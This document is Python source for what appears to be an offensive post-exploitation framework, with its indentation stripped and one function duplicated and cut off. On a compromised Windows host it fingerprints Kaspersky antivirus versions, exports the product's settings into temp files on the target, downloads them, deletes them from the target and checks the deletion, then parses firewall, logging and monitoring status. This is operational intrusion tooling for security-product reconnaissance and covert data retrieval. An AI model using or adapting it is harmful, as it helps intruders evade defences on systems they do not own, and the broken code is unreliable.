shared.safePrint(('| SCRIPT VERSION: ' + scriptVer))
shared.safePrint('+---------------------------------------------------------------------------------')
if (2 != len(kasProcQuery)):
shared.safePrint('| I APPEAR TO HAVE ENCOUNTERED A PROBLEM WITH THE PROC TABLE QUERY RESULTS...')
shared.safePrint(('| THERE SHOULD BE 2 PROCESSES RUNNING; I SEE %d!!!' % len(kasProcQuery)))
for a in range(len(kasProcQuery)):
shared.safePrint(('| %s\t\t%s\t\t%s' % (kasProcQuery[a][1], kasProcQuery[a][0], kasProcQuery[a][2])))
if (0 == len(kasProcQuery)):
shared.safePrint('| NONE- WHY IS THIS SCRIPT RUNNING?!?!?!!?!?!')
shared.safePrint('| I AM EXITING BECAUSE I DO NOT THINK YOU HAVE KASPERSKY!')
shared.safePrint('+---------------------------------------------------------------------------------')
return False
elif (1 == len(kasProcQuery)):
shared.safePrint('| I ONLY SEE ONE PROCESS RUNNING- THIS MAY BE BECAUSE NO USER IS LOGGED IN')
shared.safePrint('| REGARDLESSS, THIS IS NOT NORMAL, AND IF THIS IS KAS 2010 OR 2011 STOP NOW!')
else:
shared.safePrint('| ADDITIONAL PROCESSES MAY BE DUE TO THE PRESENCE OF')
shared.safePrint('| AN UPDATE SERVER ON THIS BOX...')
shared.safePrint('+---------------------------------------------------------------------------------')
if (not dsz.ui.Prompt('ARE YOU SURE YOU WANT TO CONTINUE?', False)):
return False
if (1 != len(kasAppQuery)):
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| I APPEAR TO HAVE ENCOUNTERED A PROBLEM WITH THE APP TABLE QUERY RESULTS...')
shared.safePrint(('| THERE SHOULD BE 1 APPLICATION INSTALLED; I SEE %d:' % len(kasAppQuery)))
for a in range(len(kasAppQuery)):
shared.safePrint(('| %s' % kasAppQuery[a][0]))
if (0 == len(kasAppQuery)):
shared.safePrint('| THERE ARE NO MATCHES...')
shared.safePrint('| CHANCES ARE GOOD THAT YOU ARE HERE BECAUSE YOUR BOX IS IN RUSSIAN...')
else:
shared.safePrint('| YOU HAVE MULTIPLE KASPERSKY APPLICATIONS...')
shared.safePrint('| CHANCES ARE GOOD THAT YOU ARE HERE BECAUSE YOUR BOX IS AN UPDATE SERVER...')
shared.safePrint('| I HAVE FAILED TO FINGERPRINT WITH THE PRIMARY TECHNIQUE...')
if dsz.ui.Prompt('WOULD YOU LIKE ME TO TRY AND FINGERPRINT USING REG KEYS (SECONDARY TECHNIQUE)?', True):
shared.safePrint('| QUERYING REGISTRY...')
dsz.control.echo.Off()
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
regCmd = 'registryquery -hive L -key software\\KasperskyLab'
shared.safePrint('FAILED FIRST REGQUERY')
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
regName = dsz.cmd.data.Get('key::subkey::name', dsz.TYPE_STRING)
numInstalls = 0
for i in range(len(regName)):
if (re.match('.*AVP.*', regName[i].upper()) and re.match('.*6.*', regName[i])):
numInstalls += 1
shared.safePrint('| LOOKS LIKE KASPERSKY v6')
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\AVP6\\settings\\ -value Ins_ProductVersion'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasVersion = tempVal[0]
shared.safePrint(('| VERSION: %s' % kasVersion))
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\AVP6\\settings\\ -value Ins_ProductType'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasType = tempVal[0]
shared.safePrint(('| TYPE: %s' % kasType))
if (re.match('.*AVP.*', regName[i].upper()) and re.match('.*80.*', regName[i])):
numInstalls += 1
shared.safePrint('| LOOKS LIKE KASPERSKY v6 MP4')
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\AVP80\\settings -value Ins_ProductVersion'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasVersion = tempVal[0]
shared.safePrint(('| VERSION: %s' % kasVersion))
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\AVP80\\settings -value Ins_ProductType'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasType = tempVal[0]
shared.safePrint(('| TYPE: %s' % kasType))
if (re.match('.*AVP.*', regName[i].upper()) and re.match('.*9.*', regName[i])):
numInstalls += 1
shared.safePrint('| LOOKS LIKE KASPERSKY v9 (AKA KASPERSKY 2010)')
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp9\\environment -value ProductVersion'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasVersion = tempVal[0]
shared.safePrint(('| VERSION: %s' % kasVersion))
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp9\\environment -value ProductType'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasType = tempVal[0]
shared.safePrint(('| TYPE: %s' % kasType))
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp9\\environment -value productroot'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasRoot = tempVal[0]
if (re.match('.*AVP.*', regName[i].upper()) and re.match('.*11.*', regName[i])):
numInstalls += 1
shared.safePrint('| LOOKS LIKE KASPERSKY v11 (AKA KASPERSKY 2011)')
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp11\\environment -value Ins_ProductVersion'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasVersion = tempVal[0]
shared.safePrint(('| VERSION: %s' % kasVersion))
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp11\\environment -value Ins_ProductType'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasType = tempVal[0]
regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp11\\environment -value productroot'
if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
shared.errorBail(('FAILED TO RUN: ' + regCmd))
return True
tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
kasRoot = tempVal[0]
shared.safePrint(('| ROOT DIR: %s' % kasRoot))
if (numInstalls > 1):
shared.errorBail('THERE ARE MULTIPLE KASPERSKY PSPS ON THE BOX!!!')
return True
dsz.control.echo.On()
else:
kasName = kasAppQuery[0][0]
kasDescription = kasAppQuery[0][1]
kasVersion = kasAppQuery[0][2]
kasType = kasProcQuery[0][0]
kasRoot = kasProcQuery[0][3]
if (re.match('.*WORKSTATION.*', kasName.upper()) or ('WKS' == kasType.upper())):
shared.safePrint('| IT APPEARS TO BE FOR WORKSTATIONS....')
isWorkstation = True
if (re.match('.*SECURITY.*', kasName.upper()) or ('KIS' == kasType.upper())):
shared.safePrint('| IT APPEARS TO BE INTERNET SECURITY....')
isInternetSec = True
for i in range(len(kasProcQuery)):
if re.match('.*SYSTEM.*', kasProcQuery[i][1]):
sysPid = kasProcQuery[i][2]
if re.match('.*user.*', kasProcQuery[i][1]):
usrPid = kasProcQuery[i][2]
shared.safePrint(('| PRODUCT NAME: %s' % kasName))
shared.safePrint(('| VERSION: %s' % kasVersion))
shared.safePrint(('| SYSTEM PID: %d' % usrPid))
shared.safePrint(('| USER PID: %d' % sysPid))
shared.safePrint('+---------------------------------------------------------------------------------')
if (kasVersion != ''):
kasVerSplit = kasVersion.split('.')
if (('6' == kasVerSplit[0]) and isWorkstation):
if ('4' == kasVerSplit[2]):
if dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 6 FOR WINDOWS WORKSTATIONS MP4?', True):
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| CALLING FUNCTION TO HANDLE VERSION 6 MP4 FOR WINDOWS WORKSTATIONS....')
ver_six.kasVerSixMp4(kasName, kasDescription, kasVersion, kasRoot)
else:
return False
elif dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 6 FOR WINDOWS WORKSTATIONS (NOT MP4)?', True):
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| CALLING FUNCTION TO HANDLE VERSION 6 FOR WINDOWS WORKSTATIONS (NOT MP4)....')
ver_six.kasVerSix(kasName, kasDescription, kasVersion, kasRoot)
else:
return False
elif (('9' == kasVerSplit[0]) and isInternetSec):
if dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 9 (AKA 2010)?', True):
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| CALLING FUNCTION TO HANDLE VERSION 9 (AKA 2010)....')
ver_nine.kasVerNine(kasName, kasDescription, kasVersion, kasRoot)
else:
return False
elif (('11' == kasVerSplit[0]) and isInternetSec):
if dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 11 (AKA 2011)?', True):
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| CALLING FUNCTION TO HANDLE VERSION 11 (AKA 2011)....')
ver_eleven.kasVerEleven(kasName, kasDescription, kasVersion, kasRoot)
else:
return False
else:
shared.safePrint('| -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
shared.safePrint('| THIS VERSION APPEARS TO BE UNSUPPORTED. PLEASE HARASS THOSE RESPONSIBLE.')
shared.safePrint('| -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
shared.safePrint('+---------------------------------------------------------------------------------')
kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
try:
kasXmlFilePtr.write('<kaspersky_settings>\n')
kasXmlFilePtr.write('<vendor>KASPERSKY</vendor>\n')
kasXmlFilePtr.write((('<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
kasXmlFilePtr.write((('<description>' + shared.xmlScrub(kasName)) + '</vendor>\n'))
kasXmlFilePtr.write((('<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
kasXmlFilePtr.write('</kaspersky_settings>\n')
finally:
kasXmlFilePtr.close()
else:
shared.safePrint(('ERRORED PARISNG %s FOR VERSION!' % kasVersion))
return True
def kasVerEleven(kasName, kasDescription, kasVersion, kasRoot):
if re.match('.*ANTI.*', kasName.upper()):
shared.safePrint('| IT APPEARS TO BE ANTI-VIRUS ONLY... YOU DO NOT NEED ME.')
shared.safePrint('+---------------------------------------------------------------------------------')
kasFlavor = 'ANTIVIRUS'
else:
kasFlavor = 'SECURITY'
logDir = dsz.lp.GetLogsDirectory()
copyCmd = 'cmd /C copy '
kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
shared.safePrint('| THIS NEW VERSION OF THE KASPERSKY 2011 SCRIPT USES DATA RETRIEVED FROM THE')
shared.safePrint('| ACTUAL KASPERSKY PROCESS; IT DOES NOT QUERY THE REGISTRY ANYMORE.')
shared.safePrint('| THIS MEANS THAT WE WILL CREATE FOUR FILES ON TARGET, DOWNLOAD THEM, AND DELETE')
shared.safePrint('| THEM. PLEASE ENSURE THAT THE SCRIPT REMOVES THESE FILES CORRECTLY.')
shared.safePrint('| GENERALLY SPEAKING, THESE FILES COMBINED ARE TYPICALLY LESS THAN 500K.')
shared.safePrint('| IF THERE IS A GOOD REASON NOT TO CREATE AND DOWNLOAD THESE FILES, PLEASE')
shared.safePrint('| QUIT OUT OF THIS SCRIPT AND MANUALLY CHECK REGISTRY SETTINGS.')
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint('| ***** NEW FOR VERSION 2011 ****')
shared.safePrint('| KASPERSKY 2011 DOES NOT ALLOW FOR THE SIMPLE EXFIL OF DATA TO A SINGLE FILE.')
shared.safePrint('| AS SUCH, WE MUST CREATE 4 FILES ON TARGET (2xTXT 2xDAT), RETRIEVE THEM,')
shared.safePrint('| CONCATENATE THEM LOCALLY, AND FINALLY, PARSE THEM.')
shared.safePrint('| THIS IS NOT A QUICK PROCESS AND WILL LIKELY TAKE ~5-10 MINUTES.')
shared.safePrint('| ***** PATIENCE IS A VIRTUE *****')
shared.safePrint('+---------------------------------------------------------------------------------')
dsz.ui.Pause('DO YOU WISH TO CONTINUE AND CREATE/GET THE KASPERSKY SETTINGS FILES? (REQUIRED TO CONTINUE)')
(tarWinDir, tarSysDir) = dsz.path.windows.GetSystemPaths()
tarTempDir = (tarWinDir + '\\temp')
kasOutFile = ''
exportType = ''
dsz.control.echo.Off()
tempFileName = (logDir + '\\kastemp.txt')
devNull = ''
tempCmd = (('local run -command "cmd /C type NUL > ' + tempFileName) + '" -redirect')
dsz.cmd.Run(tempCmd)
for i in range(4):
if (i == 0):
exportType = 'rtp'
if (i == 2):
exportType = 'fw'
if ((i % 2) == 0):
kasOutFile = '~klset.txt'
else:
kasOutFile = '~klset.dat'
if dsz.file.Exists(kasOutFile, tarTempDir):
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint(('|\t!!!FILE %s\\%s MAY ALREADY EXIST ON TARGET!!!' % (tarTempDir, kasOutFile)))
shared.safePrint('|\t!!!SEEK HELP IMMEDIATELY!!! !!!BAILING FROM SCRIPT!!!')
shared.safePrint('|\t!!!SEE BELOW DIR COMMAND OUTPUT!!!')
shared.safePrint('+---------------------------------------------------------------------------------')
dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') + kasOutFile))
return False
else:
shared.safePrint('+---------------------------------------------------------------------------------')
shared.safePrint(('| CREATING FILE %d OF 4 ON TARGET....' % (i + 1)))
if dsz.cmd.Run((((((((('run -command "\\"' + kasRoot) + '\\avp.com\\" export ') + exportType) + ' \\"') + tarTempDir) + '\\') + kasOutFile) + '\\"" -redirect')):
shared.safePrint(('| SUCCESSFULLY CREATED %s\\%s ON TARGET' % (tarTempDir, kasOutFile)))
dsz.cmd.Run(((('foreground get ' + tarTempDir) + '\\') + kasOutFile), dsz.RUN_FLAG_RECORD)
[getFile] = dsz.cmd.data.Get('filelocalname::localname', dsz.TYPE_STRING)
if ((i % 2) == 0):
tempCmd = (((((('local run -command "cmd /C type ' + logDir) + '\\GetFiles\\') + getFile) + ' >> ') + tempFileName) + '" -redirect')
dsz.cmd.Run(tempCmd)
if dsz.cmd.Run(((('del ' + tarTempDir) + '\\') + kasOutFile)):
shared.safePrint(('| SUCCESSFULLY DELETED %s\\%s ON TARGET' % (tarTempDir, kasOutFile)))
if dsz.file.Exists(kasOutFile, tarTempDir):
shared.safePrint(('PLEASE CHECK THE STATUS OF THE FILE %s\\%s ON TARGET!!!' % (tarTempDir, kasOutFile)))
dsz.ui.Pause(('!!! VERIFY THAT THE FILE %s\\%s IS NOT ON TARGET!!!' % (tarTempDir, kasOutFile)))
else:
shared.safePrint(('| VERIFIED DELETION OF FILE %s\\%s FROM TARGET' % (tarTempDir, kasOutFile)))
if (dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') + kasOutFile)) == 0):
shared.safePrint('| DIRECTORY LISTING FAILED')
else:
shared.safePrint(('FAILED TO DELETE %s FROM TARGET' % kasOutFile))
dsz.ui.Pause(('!!! VERIFY THAT THE FILE %s/%s IS NOT ON TARGET!!!' % (tarTempDir, kasOutFile)))
shared.safePrint('+---------------------------------------------------------------------------------')
dsz.ui.Pause('PLEASE CHECK THE ABOVE OUTPUTS TO ENSURE ALL FILES WERE DELETED.')
try:
kasXmlFilePtr.write('<kaspersky_settings>\n')
kasXmlFilePtr.write('<vendor>KASPERSKY</vendor>\n')
kasXmlFilePtr.write((('<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
kasXmlFilePtr.write((('<description>' + shared.xmlScrub(kasName)) + '</description>\n'))
kasXmlFilePtr.write((('<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
shared.safePrint(('| ATTEMPTING TO OPEN FILE: ' + tempFileName))
kasFilePtr = open(tempFileName)
swLevel = 0
fwLevel = 0
inRegGuard = 0
fireWallStatus = 'UNKNOWN'
allPortMonitoring = 'UNKNOWN'
fileSystemMonitor = 'UNKNOWN'
logRegEvents = 'UNKNOWN'
logNonCrit = 'UNKNOWN'
sysAccountWatch = 'UNKNOWN'
printFlag = False
try:
for line in kasFilePtr:
if re.match('.*[+] SW2.*', line):
swLevel = 1
if (re.match('.*enabled.*', line) and (swLevel == 1)):
if re.match('.*yes.*', line):
sysAccountWatch = 'ENABLED'
elif re.match('.*no.*', line):
sysAccountWatch = 'DISABLED'
kasXmlFilePtr.write((('<sys_acc_watch>' + shared.xmlScrub(sysAccountWatch)) + '</sys_acc_watch>\n'))
swLevel = 0
if re.match('.*LogFiles.*', line):
fileSystemMonitor = 'ENABLED'
if re.match('.*no.*', line):
fileSystemMonitor = 'DISABLED'
kasXmlFilePtr.write((('<file_sys_logging>' + shared.xmlScrub(fileSystemMonitor)) + '</file_sys_logging>\n'))
if re.match('.*LogReg.*', line):
logRegEvents = 'ENABLED'
if re.match('.*no.*', line):
logRegEvents = 'DISABLED'
kasXmlFilePtr.write((('<reg_event_logging>' + shared.xmlScrub(logRegEvents)) + '</reg_event_logging>\n'))
if re.match('.*FullReport.*', line):
logNonCrit = 'ENABLED'
if re.match('.*no.*', line):
logNonCrit = 'DISABLED'
kasXmlFilePtr.write((('<noncrit_event_logging>' + shared.xmlScrub(logNonCrit)) + '</noncrit_event_logging>\n'))
if re.match('.*[+].*Firewall.$.*', line):
fwLevel = 1
if ((1 == fwLevel) and re.match('.*enabled.*', line)):
if re.match('.*no.*', line):
fireWallStatus = 'DISABLED'
else:
fireWallStatus = 'ENABLED'
kasXmlFilePtr.write((('<firewall_status>' + shared.xmlScrub(fireWallStatus)) + '</firewall_status>\n'))
fwLevel = 0
if re.match('.*AllPorts.*', line):
if re.match('.*yes.*', line):
allPortMonitoring = 'ENABLED'
else:
allPortMonitoring = 'DISABLED'
if re.match('.*vRuleList_vcontent.*', line):
splitFw = line.split(' ')
fwActionBlock = splitFw[2]
m = re.match('.*?([0-9a-fA-F]{4}07268930.*0801816089).*?', line)
if m:
fwRules = m.group(1)
shared.lateKasFw(fwRules, kasXmlFilePtr, fwActionBlock)
if re.match('.*[+].*Resource.$.*', line):
inRegGuard = 1
if (re.match('.*Childs_vcontent.*', line) and (inRegGuard == 1)):
shared.lateKasRegRules(line, kasXmlFilePtr)
inRegGuard = 0
if re.match('.*4b4c41707054727573746564.*', line):
shared.lateKasAppRules(line, kasXmlFilePtr)
regGetGmd = ''
regGetCmd = 'registryquery -hive l -key SOFTWARE\\KasperskyLab\\protected\\AVP11\\profiles\\TrafficMonitor\\settings\\ -value Ports_vcontent'
dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
[regValue] = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
shared.lateKasPortMon(regValue, kasXmlFilePtr)
kasXmlFilePtr.write((('<allport_monitoring>' + allPortMonitoring) + '</allport_monitoring>'))
shared.safePrint('+----------------------------------------------------------------------------------+')
shared.safePrint('| GENERAL PSP STATUS: |')
shared.safePrint('+----------------------------------------------------------------------------------+')
shared.safePrint(('| FIREWALL IS: %s' % fireWallStatus))
shared.safePrint(('| PORT MONITORING ON ALL PORTS IS: %s' % allPortMonitoring))
shared.safePrint(('| FILE SYSTEM MONITORING: %s' % fileSystemMonitor))
shared.safePrint(('| SYSTEM ACCOUNT WATCHING IS: %s' % sysAccountWatch))
shared.safePrint(('| NON-CRITICAL EVENT LOGGING IS: %s' % logNonCrit))
shared.safePrint(('| LOGGING OF REGISTRY EVENTS IS: %s' % logRegEvents))
shared.safePrint('+----------------------------------------------------------------------------------+')
finally:
kasFilePtr.close()
finally:
kasXmlFilePtr.write('</kaspersky_settings>\n')
kasXmlFilePtr.close()
return True
def kasVerNine(kasName, kasDescription, kasVersion, kasRoot):
if re.match('.*ANTI.*', kasName.upper()):
shared.safePrint(
'| IT APPEARS TO BE ANTI-VIRUS ONLY... YOU DO NOT NEED ME.')
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
kasFlavor = 'ANTIVIRUS'
else:
kasFlavor = 'SECURITY'
shared.safePrint('| IT APPEARS TO BE INTERNET SECURITY...')
logDir = dsz.lp.GetLogsDirectory()
kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
shared.safePrint(
'| THIS NEW VERSION OF THE KASPERSKY 2010 SCRIPT USES DATA RETRIEVED FROM THE'
)
shared.safePrint(
'| ACTUAL KASPERSKY PROCESS; IT DOES NOT QUERY THE REGISTRY ANYMORE.'
)
shared.safePrint(
'| THIS MEANS THAT WE WILL CREATE TWO FILES ON TARGET, DOWNLOAD THEM, AND DELETE'
)
shared.safePrint(
'| THEM. PLEASE ENSURE THAT THE SCRIPT REMOVES THE FILES CORRECTLY.'
)
shared.safePrint(
'| GENERALLY SPEAKING, THESE FILES COMBINED ARE TYPICALLY LESS THAN 250K.'
)
shared.safePrint(
'| IF THERE IS A GOOD REASON NOT TO CREATE AND DOWNLOAD THESE FILES, PLEASE'
)
shared.safePrint(
'| QUIT OUT OF THIS SCRIPT AND MANUALLY CHECK REGISTRY SETTINGS.'
)
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
dsz.ui.Pause(
'DO YOU WISH TO CONTINUE AND CREATE/GET THE KASPERSKY SETTINGS FILES? (REQUIRED TO CONTINUE)'
)
(tarWinDir, tarSysDir) = dsz.path.windows.GetSystemPaths()
tarTempDir = (tarWinDir + '\\temp')
kasOutFile = '~klset.dat'
dsz.control.echo.Off()
tempFileName = ''
for i in range(2):
if dsz.file.Exists(kasOutFile, tarTempDir):
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
shared.safePrint(
('|\t!!!FILE %s\\%s MAY ALREADY EXIST ON TARGET!!!' %
(tarTempDir, kasOutFile)))
shared.safePrint(
'|\t!!!SEEK HELP IMMEDIATELY!!! !!!BAILING FROM SCRIPT!!!'
)
shared.safePrint('|\t!!!SEE BELOW DIR COMMAND OUTPUT!!!')
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
dsz.control.echo.On()
dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') + kasOutFile))
dsz.control.echo.Off()
return False
else:
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
if dsz.cmd.Run(
(((((('run -command "\\"' + kasRoot) +
'\\avp.com\\" export rtp \\"') + tarTempDir) + '\\') +
kasOutFile) + '\\"" -redirect')):
shared.safePrint(
('| SUCCESSFULLY CREATED %s ON TARGET' %
kasOutFile))
dsz.cmd.Run(((('foreground get ' + tarTempDir) + '\\') +
kasOutFile), dsz.RUN_FLAG_RECORD)
[getFile] = dsz.cmd.data.Get('filelocalname::localname',
dsz.TYPE_STRING)
if dsz.cmd.Run(((('del ' + tarTempDir) + '\\') + kasOutFile)):
shared.safePrint(
('| SUCCESSFULLY DELETED %s FROM TARGET' %
kasOutFile))
if dsz.file.Exists(kasOutFile, tarTempDir):
shared.safePrint((
'PLEASE CHECK THE STATUS OF THE FILE %s/%s ON TARGET!!!'
% (tarTempDir, kasOutFile)))
else:
shared.safePrint((
'| VERIFIED DELETION OF FILE %s\\%s FROM TARGET'
% (tarTempDir, kasOutFile)))
if (dsz.cmd.Run(
((('dir ' + tarTempDir) + '\\') + kasOutFile)) !=
True):
shared.safePrint('DIRECTORY LISTING FAILED')
dsz.control.echo.Off()
else:
shared.safePrint(
('FAILED TO DELETE %s FROM TARGET' % kasOutFile))
dsz.ui.Pause((
'!!! VERIFY THAT THE FILE %s\\%s IS NOT ON TARGET!!!' %
(tarTempDir, kasOutFile)))
kasOutFile = '~klset.txt'
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
dsz.ui.Pause(
'PLEASE CHECK THE ABOVE DIRECTORY OUTPUTS TO ENSURE BOTH FILES WERE SUCCESSFULLY DELETED.'
)
try:
kasXmlFilePtr.write('<kaspersky_settings>\n')
kasXmlFilePtr.write('<vendor>KASPERSKY</vendor>\n')
kasXmlFilePtr.write(
(('<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
kasXmlFilePtr.write((('<description>' + shared.xmlScrub(kasName)) +
'</description>\n'))
kasXmlFilePtr.write(
(('<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
shared.safePrint(
'+---------------------------------------------------------------------------------'
)
shared.safePrint(
'| THE SCRIPT HAS IDENTIFIED KASPERSKY VERSION 9 (AKA 2010)...'
)
shared.safePrint(
((('| ATTEMPTING TO OPEN FILE: ' + logDir) + '\\GetFiles\\') +
getFile))
kasFilePtr = open(((logDir + '\\GetFiles\\') + getFile))
fwLevel = 0
fmLevel = 0
inRegGuard = 0
fireWallStatus = 'UNKNOWN'
allPortMonitoring = 'UNKNOWN'
fileSystemMonitor = 'UNKNOWN'
logRegEvents = 'UNKNOWN'
logNonCrit = 'UNKNOWN'
sysAccountWatch = 'UNKNOWN'
try:
for line in kasFilePtr:
if re.match('.*bWatchSystemAccount.*', line):
sysAccountWatch = 'ENABLED'
if re.match('.*no.*', line):
sysAccountWatch = 'DISABLED'
kasXmlFilePtr.write(
(('<sys_acc_watch>' +
shared.xmlScrub(sysAccountWatch)) +
'</sys_acc_watch>\n'))
if re.match('.*LogFiles.*', line):
fileSystemMonitor = 'ENABLED'
if re.match('.*no.*', line):
fileSystemMonitor = 'DISABLED'
kasXmlFilePtr.write(
(('<file_sys_logging>' +
shared.xmlScrub(fileSystemMonitor)) +
'</file_sys_logging>\n'))
if re.match('.*LogReg.*', line):
logRegEvents = 'ENABLED'
if re.match('.*no.*', line):
logRegEvents = 'DISABLED'
kasXmlFilePtr.write((('<reg_event_logging>' +
shared.xmlScrub(logRegEvents)) +
'</reg_event_logging>\n'))
if re.match('.*FullReport.*', line):
logNonCrit = 'ENABLED'
if re.match('.*no.*', line):
logNonCrit = 'DISABLED'
kasXmlFilePtr.write((('<noncrit_event_logging>' +
shared.xmlScrub(logNonCrit)) +
'</noncrit_event_logging>\n'))
if re.match('.*[+].*Firewall.$.*', line):
fwLevel = 1
if ((1 == fwLevel) and re.match('.*enabled.*', line)):
if re.match('.*no.*', line):
fireWallStatus = 'DISABLED'
else:
fireWallStatus = 'ENABLED'
kasXmlFilePtr.write(
(('<firewall_status>' +
shared.xmlScrub(fireWallStatus)) +
'</firewall_status>\n'))
fwLevel = 0
if re.match('.*AllPorts.*', line):
if re.match('.*yes.*', line):
allPortMonitoring = 'ENABLED'
else:
allPortMonitoring = 'DISABLED'
if re.match('.*vRuleList_vcontent.*', line):
splitFw = line.split(' ')
fwActionBlock = splitFw[2]
m = re.match('.*?([0-9a-fA-F]{4}07268930.*0801816089).*?',
line)
if m:
fwRules = m.group(1)
shared.lateKasFw(fwRules, kasXmlFilePtr, fwActionBlock)
if re.match('.*[+].*Resource.$.*', line):
inRegGuard = 1
if (re.match('.*Childs_vcontent.*', line)
and (inRegGuard == 1)):
shared.lateKasRegRules(line, kasXmlFilePtr)
inRegGuard = 0
if re.match('.*4b4c41707054727573746564.*', line):
shared.lateKasAppRules(line, kasXmlFilePtr)
if re.match('.*Ports_vcontent.*', line):
shared.lateKasPortMon(line, kasXmlFilePtr)
kasXmlFilePtr.write(
(('<allport_monitoring>' + allPortMonitoring) +
'</allport_monitoring>'))
shared.safePrint(
'+----------------------------------------------------------------------------------+'
)
shared.safePrint(
'| GENERAL PSP STATUS: |'
)
shared.safePrint(
'+----------------------------------------------------------------------------------+'
)
shared.safePrint(
('| FIREWALL IS: %s' %
fireWallStatus))
shared.safePrint(
('| PORT MONITORING ON ALL PORTS IS: %s' %
allPortMonitoring))
shared.safePrint(
('| FILE SYSTEM MONITORING: %s' %
fileSystemMonitor))
shared.safePrint(
('| SYSTEM ACCOUNT WATCHING IS: %s' %
sysAccountWatch))
shared.safePrint(
('| NON-CRITICAL EVENT LOGGING IS: %s' %
logNonCrit))
shared.safePrint(
('| LOGGING OF REGISTRY EVENTS IS: %s' %
logRegEvents))
shared.safePrint(
'+----------------------------------------------------------------------------------+'
)
finally:
kasFilePtr.close()
finally:
kasXmlFilePtr.write('</kaspersky_settings>\n')
kasXmlFilePtr.close()
return True
def kasVerNine(kasName, kasDescription, kasVersion, kasRoot):
if re.match('.*ANTI.*', kasName.upper()):
shared.safePrint('| IT APPEARS TO BE ANTI-VIRUS ONLY... YOU DO NOT NEED ME.')
shared.safePrint('+---------------------------------------------------------------------------------')
kasFlavor = 'ANTIVIRUS'
else:
kasFlavor = 'SECURITY'
